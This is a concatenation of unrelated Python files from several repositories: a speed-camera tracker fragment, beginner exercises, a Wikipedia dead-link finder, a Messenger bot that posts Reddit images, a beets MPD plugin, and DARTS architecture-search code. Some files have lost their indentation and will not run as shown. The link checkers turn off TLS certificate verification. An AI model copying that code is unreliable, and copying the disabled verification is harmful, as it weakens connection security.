            speeds = np.array([])
            # event capturing
            events = []
            # detect gap and data points
            car_gap = secs_diff(initial_time, cap_time)
            logging.info('Tracking')
            logging.info("Initial Data: x={:.0f} w={:.0f} area={:.0f} gap={}".format(initial_x, initial_w, biggest_area, car_gap))
            logging.info(" x-Δ Secs MPH x-pos width area dir")
            # if gap between cars too low then probably seeing tail lights of current car
            # but I might need to tweak this if I find I'm not catching fast cars
            if (car_gap < cfg.min_distance):
                state = WAITING
                direction = UNKNOWN
                motion_found = False
                biggest_area = 0
                capture.truncate(0)
                base_image = None
                logging.info("Car too close, skipping")
                continue
        else:
            # compute the lapsed time
            secs = secs_diff(timestamp, initial_time)
            # timeout after 5 seconds of inactivity
            if secs >= 5:
                state = WAITING
                direction = UNKNOWN
                motion_found = False
                biggest_area = 0
                capture.truncate(0)
                base_image = None
                logging.info('Resetting')
                continue
            if state == TRACKING:
                abs_chg = 0
                mph = 0
                distance = 0
                # infer travel direction from the horizontal motion since last frame
                if x >= last_x:
                    direction = LEFT_TO_RIGHT
                    distance = cfg.l2r_distance
                    abs_chg = (x + w) - (initial_x + initial_w)
                    mph = get_speed(abs_chg, l2r_ft_per_pixel, secs)
                else:
                    direction = RIGHT_TO_LEFT
                    distance = cfg.r2l_distance
                    abs_chg = initial_x - x
                    mph = get_speed(abs_chg, r2l_ft_per_pixel, secs)
                speeds = np.append(speeds, mph)
                areas = np.append(areas, biggest_area)
                # Store event data
                events.append({
                    'image': image.copy(),
                    'ts': timestamp,
                    # Location of object
                    'x': x,
                    'y': y,
                    'w': w,
                    'h': h,
                    # Speed
                    'mph': mph,
                    # MPH is calculated from secs, delta, fov, distance, image_width
                    'fov': cfg.fov,
                    'image_width': cfg.image_width,
                    'distance': distance,
                    'secs': secs,
                    'delta': abs_chg,
                    # Other useful data
                    'area': biggest_area,
                    'dir': str_direction(direction),
                })
                # If we've stopped or are going backward, reset.
                if mph <= 0:
                    logging.info("negative speed - stopping tracking")
                    if direction == LEFT_TO_RIGHT:
                        direction = RIGHT_TO_LEFT  # Reset correct direction
                        x = 1  # Force save
                    else:
                        direction = LEFT_TO_RIGHT  # Reset correct direction
                        x = cfg.monitored_width + MIN_SAVE_BUFFER  # Force save
                logging.info("{0:4d} {1:7.2f} {2:7.0f} {3:4d} {4:4d} {5:4d} {6:s}".format(
                    abs_chg, secs, mph, x, w, biggest_area, str_direction(direction)))
                # is front of object outside the monitored boundary? Then write date, time and speed on image
                # and save it
                if ((x <= MIN_SAVE_BUFFER) and (direction == RIGHT_TO_LEFT)) \
                        or ((x+w >= cfg.monitored_width - MIN_SAVE_BUFFER)
                            and (direction == LEFT_TO_RIGHT)):
                    sd_speed = 0
                    sd_area = 0
                    confidence = 0
                    # you need at least 3 data points to calculate a mean and we're deleting two
                    if (len(speeds) > 3):
                        # Mean of all items except the first and last one
                        mean_speed = np.mean(speeds[1:-1])
                        # Mode of area (except the first and last)
                        avg_area = np.average(areas[1:-1])
                        # SD of all items except the last one
                        sd_speed = np.std(speeds[:-1])
                        sd_area = np.std(areas[1:-1])
                        confidence = ((mean_speed - sd_speed) / mean_speed) * 100
                    elif (len(speeds) > 1):
                        # use the last element in the array
                        mean_speed = speeds[-1]
                        avg_area = areas[-1]
                        # Set it to a very high value to highlight it's not to be trusted.
                        sd_speed = 99
                        sd_area = 99999
                    else:
                        mean_speed = 0  # ignore it
                        avg_area = 0
                        sd_speed = 0
                        sd_area = 0
                    logging.info("Determined area: avg={:4.0f} deviation={:4.0f} frames={:0d}".format(avg_area, sd_area, len(areas)))
                    logging.info("Determined speed: mean={:4.0f} deviation={:4.0f} frames={:0d}".format(mean_speed, sd_speed, len(speeds)))
                    logging.info("Overall Confidence Level {:.0f}%".format(confidence))
                    # If they are speeding, record the event and image
                    recorded = recorder.record(
                        image=image,
                        timestamp=timestamp,
                        confidence=confidence,
                        mean_speed=mean_speed,
                        avg_area=avg_area,
                        sd_speed=sd_speed,
                        sd_area=sd_area,
                        speeds=speeds,
                        secs=secs,
                        direction=direction,
                        events=events
                    )
                    if recorded:
                        logging.info("Event recorded")
                        if direction == LEFT_TO_RIGHT:
                            stats_l2r = np.append(stats_l2r, mean_speed)
                        elif direction == RIGHT_TO_LEFT:
                            stats_r2l = np.append(stats_r2l, mean_speed)
                    else:
                        logging.info("Event not recorded: Speed, Area, or Confidence too low")
                    state = SAVING
                    cap_time = timestamp
                # if the object hasn't reached the end of the monitored area, just remember the speed
                # and its last position
                last_mph = mph
                last_x = x
    else:
        if state != WAITING:
            state = WAITING
            direction = UNKNOWN
            logging.info('Resetting')
    # Adjust the base_image as lighting changes through the day
    if state == WAITING:
        last_x = 0
        cv2.accumulateWeighted(gray, base_image, 0.25)
    # clear the stream in preparation for the next frame
    capture.truncate(0)
# cleanup the camera and close any open windows
cv2.destroyAllWindows()
|
AnnieJohnson25/Test | genderClassification.py | <gh_stars>0
# Gender classification from [height, weight, shoe size] with a decision tree.
# BUG FIX: the scikit-learn package is imported as 'sklearn';
# 'from scikit import tree' fails with ModuleNotFoundError.
from sklearn import tree

# Training data: [height(cm), weight(kg), shoe size]
X = [[181, 80, 44], [177, 70, 43], [160, 60, 38], [154, 54, 37], [166, 65, 40],
     [190, 90, 47], [175, 64, 39], [177, 70, 40], [159, 55, 37], [171, 75, 42],
     [181, 85, 43]]
Y = ['male', 'female', 'female', 'female', 'male', 'male', 'male', 'female',
     'male', 'female', 'male']

# clf (short for classifier) stores the fitted decision-tree model
clf = tree.DecisionTreeClassifier()
clf = clf.fit(X, Y)

# Compare a new measurement against the fitted tree to predict the gender
prediction = clf.predict([[190, 70, 43]])
print(prediction)
ViteshKhurana/RTU-DigitalLibrary | Python Programs/filewordcount.py | try:
f=open("file.txt")
except:
print("File not found ! ")
else:
a=f.read()
ls=a.split(" ")
dict={}
for word in ls:
if word in dict:
dict[word]+=1
else:
dict[word]=1
for word in dict:
print(word,"=",dict[word])
|
saiyerniakhil/python-75-hackathon | wikipedia-deadlink-finder/app.py | <reponame>saiyerniakhil/python-75-hackathon
from flask import render_template, Flask, request
import requests,re, csv, time
from bs4 import BeautifulSoup
from requests.packages.urllib3.exceptions import InsecureRequestWarning
# Link probes below use verify=False; silence urllib3's InsecureRequestWarning.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
app = Flask(__name__)
def listify(filename):
    """Return the first comma-separated field of every line in *filename*.

    Note: a line with no comma yields the whole line, trailing newline
    included, and a blank line yields "\n".
    """
    with open(filename) as handle:
        return [line.split(',')[0] for line in handle]
def url_validation(link):
    """Return True when *link* looks like an http(s):// URL (prefix regex match)."""
    pattern = (r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\), ]|'
               r'(?:%[0-9a-fA-F][0-9a-fA-F]))+')
    return re.match(pattern, str(link)) is not None
def deadLinkFinder(url):
    """Return the list of dead links found on *url*.

    Results are cached in links.csv: a URL seen before is answered from its
    stored row instead of re-probing the web. Otherwise the page is
    fetched, every valid http(s) link is requested, and non-200 responses
    (except 403, tracked as forbidden) are recorded as dead.
    """
    linkset = []
    first_column = []
    urls = []
    valid_urls = []
    dead_links = []
    conn_refused = []
    forbidden_urls = []
    first_column = listify('links.csv')
    if(str(url) in first_column):
        # Cache hit: replay the stored dead links for this URL.
        pos = first_column.index(str(url))
        with open('links.csv','r') as f:
            readcsv = list(csv.reader(f,delimiter=','))
            req_row = readcsv[pos]
        #print('Dead links:')
        try:
            # NOTE(review): the range deliberately runs one index past the
            # end; the IndexError below terminates the loop (req_row[1:]
            # would be the cleaner equivalent).
            for k in range(1,len(req_row) + 1):
                #print("* ",req_row[k])
                dead_links.append(req_row[k])
        except IndexError:
            print("")
    else:
        page = requests.get(str(url))  # The URL is of our choice
        soup = BeautifulSoup(page.content, 'html.parser')
        linkset = soup.find_all('a')
        # To get the href from the collected Hyperlinks
        for i in linkset:
            urls.append(i.get('href'))
        # Applying URL validation and Holding together all the valid URLs in a list.
        for i in urls:
            if url_validation(i):
                valid_urls.append(i)
        """
        Making request to all the valid URLs.
        A URL answering with anything other than status 200 is a Dead Link;
        status 403 is tracked separately as a Forbidden Link.
        """
        #print("Dead Links: ")
        for i in valid_urls:
            try:
                temp_page = requests.get(i, verify=False)
                if (temp_page.status_code == 403):
                    forbidden_urls.append(i)
                elif not (temp_page.status_code == 200):
                    #print("* ", i)
                    dead_links.append(i)
            except:
                # connection refused / timed out - tracked but not reported
                conn_refused.append(i)
        # Persist newly found dead links so future requests hit the cache.
        if len(dead_links) != 0:
            with open('links.csv', mode='a') as deadlinks:
                deadlink_writer = csv.writer(deadlinks, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
                deadlink_writer.writerow([str(url)]+dead_links)
    return dead_links
    # Finally printing out all the Dead Links,Forbidden Links and the URLs that are taking too long to respond.
    # if len(dead_links) == 0:
    #     print("No Dead links found.")
    # else:
    #     with open('links.csv',mode='w') as deadlinks:
    #         deadlink_writer = csv.writer(deadlinks,delimiter=',',quotechar='"',quoting=csv.QUOTE_MINIMAL)
    #         deadlink_writer.writerow([str(url)]+dead_links)
    #     print("Number of Dead links: ", len(dead_links))
@app.route("/")
def index():
return render_template("index.html")
@app.route("/view",methods=['POST', 'GET'])
def view():
if request.method == 'GET' :
return "Please submit the form"
else:
url = request.form.get('link_to')
start_time = time.time()
data = deadLinkFinder(url)
end_time = time.time() - start_time
total_number = len(data)
return render_template('output.html',data = data, time_taken = end_time,total=total_number)
|
saiyerniakhil/python-75-hackathon | wikipedia-deadlink-finder/code.py | import requests
from bs4 import BeautifulSoup
import re
import csv
import time
"""
To handle routing to insecure page i.e navigatiing to 'http' requests which donot
have SSL certificates and are consideres to be insecure.
The below lines are added to suppress the below error:
------------------------------------------------------
InsecureRequestWarning: Unverified HTTPS request is being made. Adding certificate verification is strongly advised.
"""
from requests.packages.urllib3.exceptions import InsecureRequestWarning
# Link probes below use verify=False; silence urllib3's InsecureRequestWarning.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
"""
Filtering URLs from the mixed collection of href's contaings routes, images and URLs based on a Regular Expression.
"""
def listify(filename):
    """Return the first CSV field of each line of *filename*, skipping
    lines that consist only of a newline."""
    first_fields = []
    with open(filename) as handle:
        for row in handle:
            field = row.split(',')[0]
            if field != '\n':
                first_fields.append(field)
    return first_fields
def url_validation(link):
    """Return True when *link* begins like an http/https URL."""
    urlregex = re.compile(
        r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\), ]|(?:%[0-9a-fA-F][0-9a-fA-F]))+')
    matched = urlregex.match(str(link))
    return matched is not None
#Making request to our desired Page on WikiPedia
def deadLinkFinder(url):
    """Scan *url* for dead outbound links, using links.csv as a cache.

    A previously scanned URL is replayed from its stored links.csv row;
    otherwise the page is fetched, every valid http(s) link is probed,
    and any dead links found are printed and appended to links.csv.
    """
    first_column = listify('links.csv')
    dead_links = []
    conn_refused = []
    forbidden_urls = []
    if str(url) in first_column:
        # Cache hit: replay the stored dead links for this URL.
        pos = first_column.index(str(url))
        with open('links.csv', 'r') as f:
            readcsv = list(csv.reader(f, delimiter=','))
            req_row = readcsv[pos]
        print('Dead links:')
        # The original iterated one index past the end of req_row and
        # relied on catching IndexError (printing a blank line at the end);
        # slicing is equivalent and cannot mask unrelated index errors.
        for entry in req_row[1:]:
            print("* ", entry)
        print("")
    else:
        page = requests.get(str(url))
        soup = BeautifulSoup(page.content, 'html.parser')
        # Collect hrefs from every anchor and keep only valid http(s) URLs.
        urls = [anchor.get('href') for anchor in soup.find_all('a')]
        valid_urls = [u for u in urls if url_validation(u)]
        # Probe each URL: 200 = alive, 403 = forbidden, anything else = dead;
        # connection errors / timeouts are tracked separately.
        print("Dead Links: ")
        for i in valid_urls:
            try:
                temp_page = requests.get(i, verify=False)
            except Exception:
                # BUG FIX: the original caught the failure but then fell
                # through and inspected temp_page anyway, reusing the
                # previous iteration's response (or raising NameError on
                # the first failure). Skip to the next URL instead.
                conn_refused.append(i)
                continue
            if temp_page.status_code == 403:
                forbidden_urls.append(i)
            elif temp_page.status_code != 200:
                print("* ", i)
                dead_links.append(i)
        if len(dead_links) == 0:
            print("No Dead links found.")
        else:
            # Persist the findings so the next run hits the cache branch.
            with open('links.csv', mode='a') as deadlinks:
                deadlink_writer = csv.writer(deadlinks, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
                deadlink_writer.writerow([str(url)] + dead_links)
            print("Number of Dead links: ", len(dead_links))
# Interactive entry point: ask the user for a URL and time the scan.
link = input("Enter your URL")
start_time = time.time()
deadLinkFinder(link)
end_time = time.time()-start_time
print('total time taken = ',end_time)
saiyerniakhil/python-75-hackathon | string-slices/strings.py | example = input('Enter a string')
'''
String sliciing:
a string is a like a python list and each and every element can be accessed by square bracket notation.
'''
print("example string's start to fifth characters "+example[:5])
print("example string's first to third characters "+example[1:3])
print("example string's fourth to the end of the string "+example[4:])
print("example string's fifth character from the end to first character from the end "+example[-5:-1])
print("example string's first to fifth characters "+example[1:5])
'''
Output:
Enter a string talentaccurate
example string's start to fifth characters tale
example string's first to third characters ta
example string's fourth to the end of the string entaccurate
example string's fifth character from the end to first character from the end urat
example string's first to fifth characters tale
Explanation:
t a l e n t a c c u r a t e
0 1 2 3 4 5 6 7 8 9 10 11 12 13
-14 -13 -12 -11 -10 -9 -8 -7 -6 -5 -4 -3 -2 -1
'''
|
saiyerniakhil/python-75-hackathon | introduction/intro.py | print('''
This repository is a part of Talent Accurate's python-75-hackathon.
* How to download python?
- Download python from their official website here (https://www.python.org/downloads/release/python-371/)
* How to run python?
you can run python in two ways
- command line
- integrated developemnt environment (IDLE)
* For more info visit (https://www.python.org/doc/)
''')
|
saiyerniakhil/python-75-hackathon | text-input-and-output/text-input-and-output.py | '''
Text input in python
input can be taken from the user by two ways using input function. Both ways are shown in this file.
'''
print('Enter your firstname')
firstname = input()
print('the firstname you entered is '+ firstname)
lastname = input('Enter your lastname')
print('the lastname you entered is ',lastname)
'''
Output:
Enter your firstname
Tom
the firstname you entered isTom
Enter your lastname Holland
the lastname you entered is Holland
'''
|
edjacob25/Bot | application.py | from flask import Flask, request, abort
from flask.logging import default_handler
from logging.config import dictConfig
import configparser
import os
import requests
import traceback
def configure_logging():
    """Install console (wsgi) + file log handlers at INFO level.

    BUG FIX: the original tested for the log *file* and then created the
    *directory* with os.mkdir, which raised FileExistsError whenever
    logs/ existed without default.log (e.g. after log rotation/cleanup).
    makedirs(..., exist_ok=True) is idempotent.
    """
    os.makedirs("logs", exist_ok=True)
    dictConfig({
        'version': 1,
        'formatters': {'default': {
            'format': '[%(asctime)s] %(levelname)s in %(module)s: %(message)s',
        }},
        'handlers': {
            'wsgi': {
                'class': 'logging.StreamHandler',
                # resolved lazily by dictConfig to Flask's wsgi error stream
                'stream': 'ext://flask.logging.wsgi_errors_stream',
                'formatter': 'default'
            },
            'files': {
                'class': 'logging.handlers.RotatingFileHandler',
                'filename': 'logs/default.log',
                'formatter': 'default'
            }
        },
        'root': {
            'level': 'INFO',
            'handlers': ['wsgi', 'files']
        }
    })
# Configure logging before the app is created so startup messages reach both
# handlers; drop Flask's default handler to avoid duplicate console lines.
configure_logging()
app = Flask(__name__)
app.logger.removeHandler(default_handler)
@app.route("/")
def hello():
app.logger.info("Hello there")
return get_link()
@app.route("/webhook")
def verification():
config = configparser.ConfigParser()
config.read('vars.ini')
original_token = config["Tokens"]["fb_verify_token"]
mode = request.args["hub.mode"]
token = request.args["hub.verify_token"]
challenge = request.args["hub.challenge"]
if mode is None or token is None:
abort(403)
elif mode == "subscribe" and token == original_token:
return challenge
else:
abort(403)
@app.route("/webhook", methods=["POST"])
def messages():
# '{"object": "page", "entry": [{"messaging": [{"message": "TEST_MESSAGE"}]}]}'
all = request.json
if all["object"] == "page":
for item in all["entry"]:
try:
send_message_back(item["messaging"][0]["sender"]["id"])
except Exception as e:
app.logger.info("Could not send message")
app.logger.error(e)
app.logger.error(traceback.format_exc())
app.logger.info(item)
app.logger.info(item["messaging"][0])
return "EVENT_RECEIVED"
else:
abort(404)
def send_message_back(user_id):
    """POST a reply (today's top pup image link) to *user_id* via the Graph API."""
    config = configparser.ConfigParser()
    config.read('vars.ini')
    access_token = config["Tokens"]["access_token_page"]
    text = "Por el momento solo te devuelvo la foto del perrito del dia, que es {}".format(get_link())
    payload = {
        "recipient": {"id": user_id},
        "message": {"text": text},
    }
    requests.post(
        "https://graph.facebook.com/v10.0/me/messages",
        params={"access_token": access_token},
        json=payload,
    )
def get_link():
    """Return the image URL of today's top post on r/rarepuppers.

    Obtains an application-only OAuth token (installed-client grant) and
    then queries the subreddit's top post of the day.
    """
    r = requests.post("https://www.reddit.com/api/v1/access_token",
                      data={"grant_type": "https://oauth.reddit.com/grants/installed_client",
                            "device_id": "DO_NOT_TRACK_THIS_DEVICE"},
                      auth=("ZJKlJzbFxkGauA", ""),
                      headers={'User-agent': 'Muzei for reddit 0.1'})
    token = r.json()['access_token']
    # BUG FIX: bearer tokens travel in the standard 'Authorization' header
    # (RFC 6750); the original sent a nonstandard 'Authentication' header,
    # so the token was silently ignored by the server.
    r2 = requests.get("https://api.reddit.com/r/rarepuppers/top?t=day&limit=1",
                      headers={'User-agent': 'Muzei for reddit 0.1',
                               "Authorization": "bearer {}".format(token)})
    j = r2.json()
    return j["data"]["children"][0]["data"]["url"]
if __name__ == "__main__":
app.run(host='0.0.0.0')
|
dbogdanov/beets-mpdadd | setup.py | from setuptools import setup
# Packaging metadata for the beets-mpdadd plugin.
setup(
    name='beets-mpdadd',
    version='0.2',
    description='beets plugin that adds query results to the current MPD playlist',
    author='<NAME>',
    author_email='<EMAIL>',
    license='MIT',
    platforms='ALL',
    packages=['beetsplug'],
    install_requires=['beets', 'python-mpd2'],
)
|
dbogdanov/beets-mpdadd | beetsplug/mpdadd.py | <gh_stars>0
from beets.plugins import BeetsPlugin
from beets.ui import Subcommand
from beets import ui
from beets import config
from os.path import relpath
from mpd import MPDClient
def mpd_add(lib, opts, args):
    """Converts results from a query to relative uris and sends them to MPD.
    """
    # BUG FIX: sys.exit() is used below but the module never imports sys,
    # which raised NameError when the user declined a large add.
    import sys

    # Read user configuration.
    host = config['mpd']['host'].get()
    port = config['mpd']['port'].get()
    password = config['mpd']['password'].get()
    music_directory = config['mpd']['music_directory'].get()

    # Report how many items are about to be added; confirm very large adds.
    def aye(item_list, item_type):
        num = len(item_list)
        if num == 0:
            ui.print_(ui.colorize('red', 'No items match your query.'))
            return
        if num > 1:
            item_type += 's'
        # BUG FIX: this check used to sit in an 'elif' after 'num > 1',
        # making the >100 confirmation prompt unreachable.
        if num > 100:
            ui.print_(ui.colorize('red', 'Add %s %s to playlist?' % (num, item_type)))
            if ui.input_options(('Yes', 'No')) == 'n':
                sys.exit(0)
        ui.print_(ui.colorize('brown', 'Adding %s %s to playlist...' % (num, item_type)))

    # Perform query and retrieve the absolute path to the results.
    if opts.album:
        paths = [albums.path for albums in lib.albums(ui.decargs(args))]
        aye(paths, 'album')
    else:
        paths = [items.path for items in lib.items(ui.decargs(args))]
        aye(paths, 'track')

    # Generate relative paths of the results from user specified directory.
    playlist = [relpath(item.decode("utf-8"), music_directory) for item in paths]

    # Initialize client object.
    client = MPDClient()
    # Connect to MPD first: python-mpd2 can only send the 'password'
    # command over an established connection (the original authenticated
    # before connecting).
    client.connect(host, port)
    # Authenticate with password if one is provided.
    if password:
        client.password(password)
    # Optionally clear current playlist before adding music.
    if opts.clear:
        client.clear()
    # Iterate through URIs and send them to MPD.
    for uri in playlist:
        client.add(uri)
    # Send the play command to MPD and close the connection.
    client.play()
    client.close()
    client.disconnect()
class MPDAddPlugin(BeetsPlugin):
    """Beets plugin exposing the 'add' command (see mpd_add above)."""

    def __init__(self):
        super(MPDAddPlugin, self).__init__()
        # Register default MPD connection settings; 'music_directory'
        # falls back to the beets library directory.
        config['mpd'].add({
            'host': u'localhost',
            'port': 6600,
            'password': u'',
            'music_directory': config['directory'].as_filename(),
        })

    def commands(self):
        """Declare the 'add' subcommand and wire it to mpd_add."""
        mpd_add_command = Subcommand(
            'add',
            help='add music to your playlist'
        )
        mpd_add_command.parser.add_option(
            '-a', '--album',
            action='store_true', default=False,
            help='add albums instead of tracks'
        )
        mpd_add_command.parser.add_option(
            '-c', '--clear',
            action='store_true', default=False,
            help='clears current playlist before adding music'
        )
        mpd_add_command.func = mpd_add
        return [mpd_add_command]
|
zhengjian2322/darts-pt | sota/cnn/model_search_sdarts.py | <gh_stars>1-10
import torch.nn.functional as F
from sota.cnn.operations import *
from sota.cnn.genotypes import Genotype
import sys

# Make the repository root importable so the absolute 'sota.' import below
# resolves when this module is run from its own directory.
sys.path.insert(0, '../../')
from sota.cnn.model_search import Network
class SDartsNetwork(Network):
    """Search network for SDARTS: supports temporarily replacing the raw
    architecture parameters with their softmax and restoring them later."""

    def __init__(self, C, num_classes, layers, criterion, primitives, args,
                 steps=4, multiplier=4, stem_multiplier=3, drop_path_prob=0.0):
        super(SDartsNetwork, self).__init__(C, num_classes, layers, criterion, primitives, args,
                                            steps, multiplier, stem_multiplier, drop_path_prob)
        # True while the alpha tensors hold softmaxed values
        self.softmaxed = False

    def _save_arch_parameters(self):
        # Snapshot the current (pre-softmax) alphas so they can be restored.
        self._saved_arch_parameters = [p.clone() for p in self._arch_parameters]

    def softmax_arch_parameters(self):
        """Overwrite each alpha tensor in place with its row-wise softmax."""
        self.softmaxed = True
        self._save_arch_parameters()
        for p in self._arch_parameters:
            p.data.copy_(F.softmax(p, dim=-1))

    def restore_arch_parameters(self):
        """Undo softmax_arch_parameters by restoring the saved alphas."""
        self.softmaxed = False
        for i, p in enumerate(self._arch_parameters):
            p.data.copy_(self._saved_arch_parameters[i])
        del self._saved_arch_parameters

    def get_softmax(self):
        """Return normalized edge weights for both cell types.

        When the alphas are already softmaxed they are returned as-is to
        avoid normalizing twice.
        """
        if self.softmaxed:
            weights_normal = self.alphas_normal
            weights_reduce = self.alphas_reduce
        else:
            weights_normal = F.softmax(self.alphas_normal, dim=-1)
            weights_reduce = F.softmax(self.alphas_reduce, dim=-1)
        return {'normal': weights_normal, 'reduce': weights_reduce}
|
zhengjian2322/darts-pt | sota/cnn/spaces.py | from collections import OrderedDict
# Candidate-operation search spaces. Each space lists, per cell type
# ('primitives_normal' / 'primitives_reduct'), the allowed operations for
# each of the 14 edges of a 4-intermediate-node cell. s5 is the full DARTS
# space; s1-s4 are reduced spaces (presumably the RobustDARTS S1-S4
# benchmarks - TODO confirm against the originating paper/repo).

# s1: two pre-selected candidate ops per edge (edge-specific).
primitives_1 = OrderedDict([('primitives_normal', [['skip_connect', 'dil_conv_3x3'],
                                                   ['skip_connect', 'dil_conv_5x5'],
                                                   ['skip_connect', 'dil_conv_5x5'],
                                                   ['skip_connect', 'sep_conv_3x3'],
                                                   ['skip_connect', 'dil_conv_3x3'],
                                                   ['max_pool_3x3', 'skip_connect'],
                                                   ['skip_connect', 'sep_conv_3x3'],
                                                   ['skip_connect', 'sep_conv_3x3'],
                                                   ['skip_connect', 'dil_conv_3x3'],
                                                   ['skip_connect', 'sep_conv_3x3'],
                                                   ['max_pool_3x3', 'skip_connect'],
                                                   ['skip_connect', 'dil_conv_3x3'],
                                                   ['dil_conv_3x3', 'dil_conv_5x5'],
                                                   ['dil_conv_3x3', 'dil_conv_5x5']]),
                            ('primitives_reduct', [['max_pool_3x3', 'avg_pool_3x3'],
                                                   ['max_pool_3x3', 'dil_conv_3x3'],
                                                   ['max_pool_3x3', 'avg_pool_3x3'],
                                                   ['max_pool_3x3', 'avg_pool_3x3'],
                                                   ['skip_connect', 'dil_conv_5x5'],
                                                   ['max_pool_3x3', 'avg_pool_3x3'],
                                                   ['max_pool_3x3', 'sep_conv_3x3'],
                                                   ['skip_connect', 'dil_conv_3x3'],
                                                   ['skip_connect', 'dil_conv_5x5'],
                                                   ['max_pool_3x3', 'avg_pool_3x3'],
                                                   ['max_pool_3x3', 'avg_pool_3x3'],
                                                   ['skip_connect', 'dil_conv_5x5'],
                                                   ['skip_connect', 'dil_conv_5x5'],
                                                   ['skip_connect', 'dil_conv_5x5']])])
# s2: every edge chooses between skip_connect and sep_conv_3x3.
primitives_2 = OrderedDict([('primitives_normal', 14 * [['skip_connect',
                                                         'sep_conv_3x3']]),
                            ('primitives_reduct', 14 * [['skip_connect',
                                                         'sep_conv_3x3']])])
# s3: as s2 plus an explicit 'none' (zero) candidate.
primitives_3 = OrderedDict([('primitives_normal', 14 * [['none',
                                                         'skip_connect',
                                                         'sep_conv_3x3']]),
                            ('primitives_reduct', 14 * [['none',
                                                         'skip_connect',
                                                         'sep_conv_3x3']])])
# s4: sep_conv_3x3 versus a pure 'noise' op on every edge.
primitives_4 = OrderedDict([('primitives_normal', 14 * [['noise',
                                                         'sep_conv_3x3']]),
                            ('primitives_reduct', 14 * [['noise',
                                                         'sep_conv_3x3']])])
# Full DARTS operation set; indices in the trailing comments are the
# column positions of each op in the alpha tensors.
PRIMITIVES = [
    # 'none',
    'max_pool_3x3',  # 0
    'avg_pool_3x3',  # 1
    'skip_connect',  # 2
    'sep_conv_3x3',  # 3
    'sep_conv_5x5',  # 4
    'dil_conv_3x3',  # 5
    'dil_conv_5x5'   # 6
]
# s5: the full 7-op DARTS space on every edge.
primitives_5 = OrderedDict([('primitives_normal', 14 * [PRIMITIVES]),
                            ('primitives_reduct', 14 * [PRIMITIVES])])
# Lookup table used to select a space by its command-line name.
spaces_dict = {
    's1': primitives_1,
    's2': primitives_2,
    's3': primitives_3,
    's4': primitives_4,
    's5': primitives_5,  # DARTS Space
}
|
zhengjian2322/darts-pt | sota/cnn/model_search_sdarts_proj.py | import torch.nn.functional as F
from sota.cnn.operations import *
from sota.cnn.genotypes import Genotype
import sys

# Ensure the repository root is on sys.path so the 'sota.' import resolves.
sys.path.insert(0, '../../')
from sota.cnn.model_search_darts_proj import DartsNetworkProj
class SDartsNetworkProj(DartsNetworkProj):
    """Projection-based SDARTS search network.

    Like SDartsNetwork, but the "softmax" step writes the *projected*
    weights (from the base class) into the alpha tensors.
    """

    def __init__(self, C, num_classes, layers, criterion, primitives, args,
                 steps=4, multiplier=4, stem_multiplier=3, drop_path_prob=0.0):
        super(SDartsNetworkProj, self).__init__(C, num_classes, layers, criterion, primitives, args,
                                                steps=steps, multiplier=multiplier, stem_multiplier=stem_multiplier,
                                                drop_path_prob=drop_path_prob)
        # True while the alpha tensors hold projected/softmaxed values
        self.softmaxed = False

    def _save_arch_parameters(self):
        # Snapshot the current alphas so they can be restored later.
        self._saved_arch_parameters = [p.clone() for p in self._arch_parameters]

    def softmax_arch_parameters(self):
        """Overwrite each alpha tensor with its projected weights in place."""
        self._save_arch_parameters()
        for p, cell_type in zip(self._arch_parameters, self.candidate_flags.keys()):
            p.data.copy_(self.get_projected_weights(cell_type))
        self.softmaxed = True  # after self.get_projected_weights

    def restore_arch_parameters(self):
        """Undo softmax_arch_parameters by restoring the saved alphas."""
        for i, p in enumerate(self._arch_parameters):
            p.data.copy_(self._saved_arch_parameters[i])
        del self._saved_arch_parameters
        self.softmaxed = False

    def get_softmax(self):
        """Return normalized edge weights for both cell types (no double softmax)."""
        if self.softmaxed:
            weights_normal = self.alphas_normal
            weights_reduce = self.alphas_reduce
        else:
            weights_normal = F.softmax(self.alphas_normal, dim=-1)
            weights_reduce = F.softmax(self.alphas_reduce, dim=-1)
        return {'normal': weights_normal, 'reduce': weights_reduce}

    def arch_parameters(self):
        """Expose the raw architecture parameters."""
        return self._arch_parameters
|
zhengjian2322/darts-pt | sota/cnn/visualize_full.py | <reponame>zhengjian2322/darts-pt<gh_stars>1-10
import sys
import genotypes
import numpy as np
from graphviz import Digraph
# Edge id -> (source, destination) for every edge of a 4-step DARTS cell:
# "c_{k-2}" / "c_{k-1}" are the two cell inputs, "0".."3" the intermediate
# nodes.  Node i has i + 2 incoming edges, listed in order, so ids 0..13
# follow the canonical DARTS edge ordering.
supernet_dict = {
    0: ('c_{k-2}', '0'),
    1: ('c_{k-1}', '0'),
    2: ('c_{k-2}', '1'),
    3: ('c_{k-1}', '1'),
    4: ('0', '1'),
    5: ('c_{k-2}', '2'),
    6: ('c_{k-1}', '2'),
    7: ('0', '2'),
    8: ('1', '2'),
    9: ('c_{k-2}', '3'),
    10: ('c_{k-1}', '3'),
    11: ('0', '3'),
    12: ('1', '3'),
    13: ('2', '3'),
}
# Number of intermediate nodes per cell.
steps = 4
def plot_space(primitives, filename):
    """Render the whole search space (every candidate op on every edge) as a PDF DAG.

    `primitives` is a list of per-edge op-name lists in canonical DARTS edge
    order; `filename` is the graphviz output path (without extension).
    """
    graph = Digraph(
        format='pdf',
        edge_attr=dict(fontsize='20', fontname="times"),
        node_attr=dict(style='filled', shape='rect', align='center', fontsize='20', height='0.5', width='0.5',
                       penwidth='2', fontname="times"),
        engine='dot')
    graph.body.extend(['rankdir=LR'])
    graph.body.extend(['ratio=50.0'])
    # The two cell inputs.
    graph.node("c_{k-2}", fillcolor='darkseagreen2')
    graph.node("c_{k-1}", fillcolor='darkseagreen2')
    num_steps = 4
    for node_id in range(num_steps):
        graph.node(str(node_id), fillcolor='lightblue')
    # Walk the edges node by node: node i has one edge from each earlier node.
    predecessors = ["c_{k-2}", "c_{k-1}"]
    offset = 0
    for node_id in range(num_steps):
        dst = str(node_id)
        edge_prims = primitives[offset:offset + len(predecessors)]
        for src, ops in zip(predecessors, edge_prims):
            for op_name in ops:
                graph.edge(src, dst, label=op_name, fillcolor="gray")
        offset += len(predecessors)
        predecessors.append(dst)
    # Cell output concatenates all intermediate nodes.
    graph.node("c_{k}", fillcolor='palegoldenrod')
    for node_id in range(num_steps):
        graph.edge(str(node_id), "c_{k}", fillcolor="gray")
